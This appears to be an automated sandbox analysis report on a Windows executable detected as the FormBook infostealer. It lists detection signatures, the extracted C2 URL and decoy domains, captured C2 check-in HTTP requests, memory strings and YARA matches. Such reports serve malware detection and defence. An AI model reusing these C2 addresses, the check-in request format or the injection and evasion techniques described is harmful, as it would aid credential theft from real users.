Windows Analysis Report NQBNpLezqZKv1P4.exe

Overview

General Information

Sample Name: NQBNpLezqZKv1P4.exe
Analysis ID: 452473
MD5: f03bf8d3ecc2ae4b40f836c59ac09bdf
SHA1: 58f48a5a960eac4ee1f33ea16075cfd44f37b3a3
SHA256: 2e4cf88a434d484057fcc090cb7de5deb6d30c8e00da339c886f2482f6a7ebe1
Tags: exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.extraclass.xyz/4nn8/"], "decoy": ["chamtowon.com", "yaaquu.com", "thepettybox.com", "zrcezzfdfkyjlir.com", "finalcutgrowshop.com", "856381151.xyz", "fbgroupsmadesimple.com", "thinktank-texas.com", "shoppingsys.com", "natezubal.com", "skyhighbud.com", "toddlely.net", "bachelor-boys.com", "blogdepr.com", "chuanyigou.com", "photocouture-show.com", "spacetasks.com", "kureitall.com", "qmcp00033.com", "visiodaya.com", "teleasistencianamaste.com", "updates-app.com", "marbleheadelementary.com", "jameswilliamgordon.com", "bouncingbellybeans.com", "icloud-site-fd.com", "hotradioarnhem.com", "shengdagp.com", "sickrime.com", "17545bullock.com", "cmovied.com", "wwwpaturnoiketollbyplate.com", "qphis.com", "vhsstores.com", "sorcierebienaimee.com", "y7mioung.xyz", "indianapartylines.com", "fezze.info", "uweup.com", "xn--gestinvalenciana-9ub.com", "creativeartaadda.com", "cattedralidismeraldo.com", "thecarestudio.com", "etruruueurt.xyz", "sidehustle.kiwi", "hagumee.com", "sdkqglgs.com", "nirvananaturalcbd.net", "grassth.com", "zeugmagiftandmore.com", "smartscene.club", "chsecv.com", "gettothecoast.com", "whiskey-friends.com", "ambernai.com", "iregentos.info", "sh-zzjy.com", "boicity.com", "sgtcsleathers.net", "themixedveggies.com", "greenbanc.net", "papiempanadas.com", "ndirxk.club", "iafzal.com"]}
Yara detected FormBook
Source: Yara match File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: NQBNpLezqZKv1P4.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: NQBNpLezqZKv1P4.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: NQBNpLezqZKv1P4.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4x nop then pop ebx 4_2_00406A94
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4x nop then pop edi 4_2_0041567E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 10_2_00956A95
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 10_2_0096567E

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.66:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 104.143.9.211:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.extraclass.xyz/4nn8/
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.boicity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.sh-zzjy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.zrcezzfdfkyjlir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.iafzal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.nirvananaturalcbd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.updates-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.fbgroupsmadesimple.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 184.168.131.241 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.boicity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.sh-zzjy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.zrcezzfdfkyjlir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.iafzal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.nirvananaturalcbd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.updates-app.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1Host: www.fbgroupsmadesimple.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.boicity.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 11:15:39 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.zrcezzfdfkyjlir.comVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Thu, 05-Aug-2021 11:15:39 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages3.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3802Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 32 36 34 35 31 37 34 35 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65
Source: NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: http://050005.voodoo.com/js/partner.js
Source: NQBNpLezqZKv1P4.exe String found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com(
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.comp
Source: NQBNpLezqZKv1P4.exe String found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
Source: explorer.exe, 00000005.00000000.702532502.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comR
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641810889.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comTC
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comen
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.como.
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comroa
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.645535031.000000000555E000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640649210.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/ct
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnAc
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnUc
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.krklJ
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.krylx
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639209828.0000000005542000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.coml
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr.kr
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr8l
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.krbl
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comicFf
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comicwf
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnue
Source: NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmp String found in binary or memory: https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_004181B0 NtCreateFile, 4_2_004181B0
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00418260 NtReadFile, 4_2_00418260
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_004182E0 NtClose, 4_2_004182E0
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00418390 NtAllocateVirtualMemory, 4_2_00418390
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_004181AC NtCreateFile, 4_2_004181AC
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00418202 NtCreateFile, 4_2_00418202
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041840A NtAllocateVirtualMemory, 4_2_0041840A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479710 NtQueryInformationToken,LdrInitializeThunk, 10_2_03479710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479FE0 NtCreateMutant,LdrInitializeThunk, 10_2_03479FE0
